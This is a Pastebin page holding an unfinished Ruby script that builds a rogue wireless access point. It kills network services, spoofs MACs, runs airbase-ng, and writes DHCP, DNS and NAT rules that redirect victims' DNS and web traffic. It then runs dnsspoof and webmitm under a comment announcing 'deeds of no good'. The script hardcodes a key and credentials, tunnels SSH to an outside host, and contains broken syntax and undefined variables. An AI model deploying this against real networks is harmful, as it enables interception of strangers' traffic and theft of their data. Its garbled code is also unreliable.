API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 28th, 2017
517
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 8.90 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/ruby
  2. #capn-jack_mr_hai_signature_string
  3. # this is a work in progress, im going to eventuall make a complete handler for wireless router .
  4. # I started trying to make a WAP software in rub but after a while I started realizing that I shouldnt reinvent the wheel
  5. # i should just make a really good car. Im going to incorporate a bit of C and python also, the C to speed it up and the python
  6. #for some packet manipulation in the stream using scapy.
  7. #The configurtation options are all constants, i figured that instead of asking each time (since people generally have a
  8. #consistant setup) you set them in the code, the Class "packet_filter" is the filter (no really?!?!) i generally use nested ifs
  9. # for the hueristics but you can do whatever here
  10.  
  11. #install script
  12. #timed saves to pcap if ACTBAD, selective ports, most useful for tcp reconstruction
  13. require 'socket'
  14. require 'openssl'
  15. require 'rubygems'
  16. require 'net/ssh'
  17.  
  18. #find alternatives to avahi and network manager
  19. #maybe make a WAP connection script?
  20. # iw? ifconfig? both !
  21. #airodump to showcase the area, iwconfig to connect
  22. #dhclient to get an IP
  23.  
  24.  
  25. #ACL from ruby doc
  26. # have it be invoked as a response to snort
  27. #
  28.  
  29. #ssh/encryption config
  30. HOST = '192.168.1.113'
  31. USER = 'username'
  32. PASS = 'password'
  33. KEY = "qwertyuiopasdfghjklzxcvbnmqwerty"
  34. IV = "qwertyuiopasdfghjklzxcvbnmqwerty"
  35. PREAMBLE="begin_encryption"
  36.  
  37. #general config
  38. $ACTBAD=true
  39. $VERBOSE = true
  40. LOGGING= true
  41. MONITOR="mon0"
  42. EXTIF="eth1"
  43. TUNNEL="at0"
  44. INTIF="wlan1"
  45. TTY="/dev/tty10"
  46. CHAN = "9"
  47. ESSID="Firefly"
  48. `alias wpas='sudo killall -9 wpa_supplicant'`
  49. `sudo killall -9 avahi-daemon `
  50. #DHCP config
  51. RANGE="192.168.1.2 192.168.1.254"
  52. SCOPE="192.168.1.0"
  53. GATEWAY="192.168.1.1"
  54. MASK="255.255.255.0"
  55. BROADCAST="192.168.1.255"
  56. DOMAIN="cerberusrouter.net"
  57. DNS1="208.67.222.222"
  58. DNS2="208.67.220.220"
  59.  
  60.  
  61.  
  62. #Handles encryption
  63. #example
  64. #   #preparing my balls for encryption
  65. #   balls = Encryption.new("balls")
  66. #   #encrypting my balls
  67. #   balls.encrypt_payload
  68. class Encryption
  69.     def initialize (string)
  70.         @string = string
  71.     end
  72.     #encrypts
  73.     def encrypt_payload
  74.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  75.         cipher.encrypt
  76.         cipher.key = WAPinit::KEY
  77.         cipher.iv = WAPinit::IV
  78.         cipher.update(@string) + cipher.final
  79.        
  80.     end
  81.     #decrypts
  82.     def decrypt_payload
  83.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  84.         cipher.decrypt
  85.         cipher.key = WAPinit::KEY
  86.         cipher.iv = WAPinit::IV
  87.         cipher.update(@string) + cipher.final
  88.     end
  89.    
  90. end
  91.  
  92. class SSH_handler
  93.   def initialize(user, host, password)  
  94.   `ssh -f #{@user}@#{@host} -L 1337:localhost:22`
  95.     ssh -f Firefly@theowned.net -L 1337:localhost:22
  96.  
  97.   end
  98.  
  99. require 'net/ssh'
  100. Net::SSH.start('server','user') do |session|
  101.  
  102. session.forward.local(3307,'127.0.0.1', 3306)
  103.  
  104. end
  105.  
  106. #Uploads and Downloads from remote host
  107. class Scp_IO
  108.   def initialize(file ,directory, host, user, password)
  109.     @file     = file
  110.     @dir      = directory
  111.     @host     = host
  112.     @user     = user
  113.     @password = password
  114.   end
  115.  
  116.   def upload
  117.   tx = Net::SCP.start( @host, @user, :password => @password )
  118.   tx.upload!( @file, @dir )
  119.  
  120.   end
  121.   def download
  122.   rx = Net::SCP.start( @host, @user, :password => @password )
  123.   rx.download!( @file , @dir )
  124. end
  125. end
  126.  
  127. #this is a socket client to tx/rx streamimg aes-256 encrypted data.
  128. class Socket_IO_crypt
  129.   def initialize(data, port, host)
  130.   @io_obj = data
  131.   @port = port
  132.   @host = host
  133.   end
  134.  
  135. #listens for incomming connections on @port sending a encrypted string with a preamble  
  136.   def server
  137.     server = TCPServer.open(@port)
  138.     loop {                        
  139.       rx = server.accept
  140.      
  141.       #scans for a preamble and decrypts string sending it to a handler
  142.       if rx.scan(::PREAMBLE)
  143.         encrypted_str = rx.gsub(::PREAMBLE , "")
  144.         decrypted_str = Encryption.new(encrypted_str)
  145.         #send decrypted data to handler, possibly copy of the client?
  146.       else rx.puts "This is not yours"
  147.         rx.close
  148.       end
  149.     }
  150.   end
  151. #shoots an encrypted message to @host at @port with preamble
  152.   def client
  153.       tx = TCPSocket.open(@host, @port)
  154.       data = Encryption.new(@io_obj)
  155.       crypt_data = data.encrypt_payload
  156.       tx.puts ::PREAMBLE + crypt_data      
  157.       tx.close
  158.   end
  159. end
  160.  
  161. class Http_server
  162.   def initialize(port, header, max_connect, host)
  163.     @host = host #(insert php server self here)
  164.   end
  165.  
  166. end
  167.  
  168.  
  169. #instances of this class start the show
  170. class WAPinit
  171. `/etc/init.d/networking restart`
  172. #file contents of the bind and DHCP servers and the interface file
  173. interfaces = <<INTERFACE
  174. #loopback interface
  175.     auto lo iface lo inet loopback
  176.  
  177.     # interface external network (internet), configured through dhcp
  178.     auto #{EXTIF}
  179.     iface #{EXTIF} inet dhcp
  180.  
  181.     #interface network 1
  182.     auto #{INTIF}
  183.     iface #{INTIF} inet static
  184.             address #{GATEWAWY}
  185.             netmask #{MASK}
  186.             network #{SCOPE}
  187.             broadcast #{BROADCAST}
  188.  
  189.  
  190.  
  191. INTERFACE
  192.  
  193. bind = <<BIND
  194. options {
  195.     directory "/var/cache/bind";
  196.    
  197.     forwarders {
  198.         #{GATEWAY};
  199.        
  200.     };
  201.  
  202.     auth-nxdomain no;    # conform to RFC1035
  203.     listen-on-v6 { any; };
  204. };
  205. BIND
  206.  
  207.  
  208. dhcp3 = <<DHCP
  209. ddns-update-style interim;                                  
  210. ignore client-updates;
  211.  
  212. subnet #{SCOPE} netmask #{MASK} {
  213.  
  214.         range #{RANGE};                  
  215.            option subnet-mask              #{MASK};    # Default subnet mask to be used by DHCP clients
  216.            option broadcast-address        #{BROADCAST};    # Default broadcast address to be used by DHCP clients
  217.            option routers                  #{GATEWAY};      # Default gateway to be used by DHCP clients
  218.            option domain-name              "#{DOMAIN}";
  219.            option domain-name-servers      #{DNS1}, #{DNS2};           # Default DNS to be used by DHCP clients
  220. }
  221. #         DHCP requests are not forwarded. Applies when there is more than one ethernet device and forwarding is configured.
  222. #       option ipforwarding off;
  223.  
  224.          default-lease-time 21600;                            # Amount of time in seconds that a client may keep the IP address
  225.         max-lease-time 43200;
  226.  
  227.         option time-offset              -18000;              # Eastern Standard Time
  228. #       option ntp-servers              192.168.1.1;         # Default NTP server to be used by DHCP clients
  229. DHCP
  230.  
  231. ifaces = File.open("/etc/network/interfaces", "w")
  232. ifaces.syswrite(interfaces)
  233. `route add -net -n #{SCOPE} netmask #{MASK} dev #{INTIF}`
  234. `route add -net -n 0.0.0.0 dev #{EXTIF}`
  235. printf `route`
  236.  
  237. if `ifconfig`.match(/mon[0-9]/) = true
  238.  
  239.    elsif `ifconfig`.match(/at[0-9]/) = true
  240.  
  241.    elsif `ifconfig`.match(/wlan[0-9]/) = true
  242. #     `sudo killall -9 NetworkManager`
  243.      `sudo killall -9 avahi-daemon`
  244.      `killall -9 wpa_supplicant`
  245.      `airmon-ng start #{INTIF} #{CHAN}`
  246.      `gnome-terminal -e airodump-ng #{MONITOR}`
  247.      `changemac #{EXTIF}`
  248.      `changemac #{INTIF}`
  249.      `killall -9 wpa_supplicant`
  250.      pid = fork do
  251.        `airbase-ng -e #{ESSID} -v -v -c #{CHAN} -I 5000 #{MONITOR} 2>&1`
  252.      end
  253.     Process.detach(pid)
  254.    else printf "Something happened with the interfaces, please configure your system and plug in any devices"
  255.   end
  256. sleep 4
  257. `ifconfig #{TUNNEL} up`
  258. #begin the router-fu!
  259. `modprobe ip_tables`
  260. `modprobe iptable_filter`
  261. `modprobe ip_conntrack`
  262. `modprobe ip_conntrack_ftp`
  263. `modprobe ip_conntrack_irc`
  264. `modprobe iptable_nat`
  265. `modprobe ip_nat_ftp`
  266. `modprobe ip_nat_irc`
  267. `echo "1" > /proc/sys/net/ipv4/ip_dynaddr`
  268. `iptables --table nat --flush`
  269. `iptables --delete-chain`
  270. `iptables --flush`
  271. `iptables -P INPUT ACCEPT`
  272. `iptables -F INPUT `
  273. `iptables -P OUTPUT ACCEPT`
  274. `iptables -F OUTPUT `
  275. `iptables -P FORWARD DROP`
  276. `iptables -F FORWARD `
  277. `iptables -t nat -F`
  278. `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -j ACCEPT`
  279. `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -m state --state ESTABLISHED,RELATED -j ACCEPT`
  280. `iptables -A INPUT -i #{TUNNEL} -m state --state ESTABLISHED,RELATED -j ACCEPT`
  281. `iptables -A INPUT -i lo -s 0/0 -d 0/0 -j ACCEPT`
  282. `iptables -A POSTROUTING -t nat -o #{EXTIF} -j MASQUERADE`
  283. `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to #{GATEWAY}` #dns
  284. `iptables -t nat -A PREROUTING -i #{TUNNEL} -p tcp --dport 80 --j REDIRECT --to-ports 80`
  285. `echo "1" > /proc/sys/net/ipv4/ip_forward`
  286. `ifconfig at0 up`
  287. `ifconfig at0 #{GATEWAY} netmask #{MASK}`
  288. `ifconfig at0 mtu 1500`
  289. dhcpconf = File.open("/etc/dhcp3/dhcpd.conf", "w")
  290. dhcpconf.syswrite(dhcp3)
  291. `dhcpd3 #{TUNNEL}`
  292. dnsf = File.open("/etc/bind/named.conf.options", "w")
  293. dnsf.syswrite(bind)
  294. printf `/etc/init.d/bind9 restart`
  295. `notify-send "#{ESSID} - Wireless Access Point initialized"`
  296. end
  297.  
  298. #Starting the server
  299. WAPinit.new
  300.  
  301. # so far we have accomplished the task of initiating a WAP, starting DHCP, configuring the routing tables for
  302. #tranparency and configuring the interfaces.
  303.  
  304. #now we begin the deeds of no good
  305.  
  306. `dnsspoof -i #{TUNNEL}`
  307. sleep 1
  308. `webmitm -d -d -d`
  309. sleep 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!